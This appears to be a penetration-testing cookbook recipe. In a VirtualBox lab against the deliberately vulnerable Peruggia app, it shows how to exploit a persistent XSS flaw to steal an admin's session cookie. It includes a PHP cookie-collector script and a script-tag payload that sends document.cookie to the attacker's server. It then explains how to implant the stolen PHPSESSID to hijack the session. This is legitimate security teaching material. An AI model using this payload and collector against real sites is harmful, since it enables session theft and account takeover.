We have already talked about Cross Site Scripting (XSS), it is one of the most common web attacks nowadays. XSS can be used to trick the users to provide credentials by simulating login pages, to gather information by executing client-side commands, or to hijack sessions by obtaining session cookies and impersonating their legitimate owners in the attacker's browsers.
In this recipe, we will take advantage of a persistent XSS vulnerability to obtain the session cookie of a user and then use that cookie to hijack the session by implanting it in another browser, and then executing actions impersonating the user.
For this recipe, we will set up a web server that will act as our cookie gatherer; so, before we attack, we need to start the Apache server in our Kali machine and run the following in a terminal as root:
service apache2 start
In the system used for this book, Apache's document root is located at /var/www/html, create a file called savecookie.php in that directory and put the following code in it:
<?php
$fp = fopen('/tmp/cookie_data.txt', 'a');
fwrite($fp, $_GET["cookie"] . "
");
fclose($fp);
?>This PHP script is the one that will gather all the cookies sent by the XSS attack. To make sure that it works go to http://127.0.0.1/savecookie.php?cookie=test, and then check the contents of /tmp/cookie_data.txt:
cat /tmp/cookie_data.txt
If it shows the word test, everything is fine. The next step is to know what is the address of our Kali machine in the VirtualBox's Host Only network. In a terminal, run:
ifconfig
For this book, the vboxnet0 interface of the Kali machine has the 192.168.56.1 IP address.
- We will use two different browsers in this recipe, OWASP-Mantra will be the attacker's browser and Iceweasel will be the victim's. In the attacker's browser, go to
http://192.168.56.102/peruggia/. - Let's add a comment to the picture on that page, click on Comment on this picture.
- Insert the following in the text box:
<script> var xmlHttp = new XMLHttpRequest(); xmlHttp.open( "GET", "http://192.168.56.1/savecookie.php?cookie=" + document.cookie, true ); xmlHttp.send( null ); </script>
- Click on Post.
- The page will execute our script even if we don't see any change,. Check the contents of the cookies file to see the result. On your Kali machine, open a terminal and run:
cat /tmp/cookie_data.txt
A new entry should appear in the file.
- Now, in the victim's browser go to
http://192.168.56.102/peruggia/. - Click on Login.
- Enter
admin, both as username and password and click on Login. - Let's check the contents of the cookies file again:
cat /tmp/cookie_data.txt
The last entry was generated by the user in the victim's browser.
- Now in the attacker's browser, make sure that you have not logged in and opened the Cookies Manager+ (in Mantra's Menu, Tools | Application Auditing | Cookies Manager+).
- Select the PHPSESSID cookie from 192.168.56.102 (the vulnerable_vm) and click on Edit.
- Copy the last cookie value from
/tmp/cookie_data.txtand paste it in the Content field, as shown:
- Click on Save, then Close and reload the page in the attacker's browser:
Now we have the admin's session hijacked via a persistent XSS attack.
In short, we used an XSS vulnerability in the application to send the session cookie to a remote server through a JavaScript HTTP request; this server was configured to store the session cookies. Then, we took one session ID and implanted it in a different browser to hijack an authenticated user's session. Next, we will see how each step works.
The PHP file we made in the Getting ready section is the one that saves the received cookies when the XSS attack is executed.
The comment we introduced is a script that uses the XMLHttpRequest object from JavaScript to make an HTTP request to our malicious server; that request is made in two steps:
xmlHttp.open( "GET", "http://192.168.56.1/savecookie.php?cookie=" + document.cookie, true );
We open a request using the "GET" method, adding a parameter called cookie to the http://192.168.56.1/savecookie.php URL whose value is the one stored in document.cookie, which is the variable that stores the cookies value in JavaScript. Finally, the last parameter that is set to true tells the browser that it will be an asynchronous request, which means that it does not have to wait for a response.
xmlHttp.send( null );
This last instruction sends the request to the server.
After the administrator logs in and views a page that includes the comment we posted, the script is executed and the administrator's session cookie is stored in our server.
Finally, once we get the session ID of a valid user, we just replace our own session cookie with it in the browser and reload the page to perform an operation, as if we were such user.
Instead of only saving the session cookies to a file, the malicious server can also use those cookies to send requests to the application impersonating legitimate users, in order to perform operations such as adding or deleting comments, uploading pictures, or creating new users, even administrators.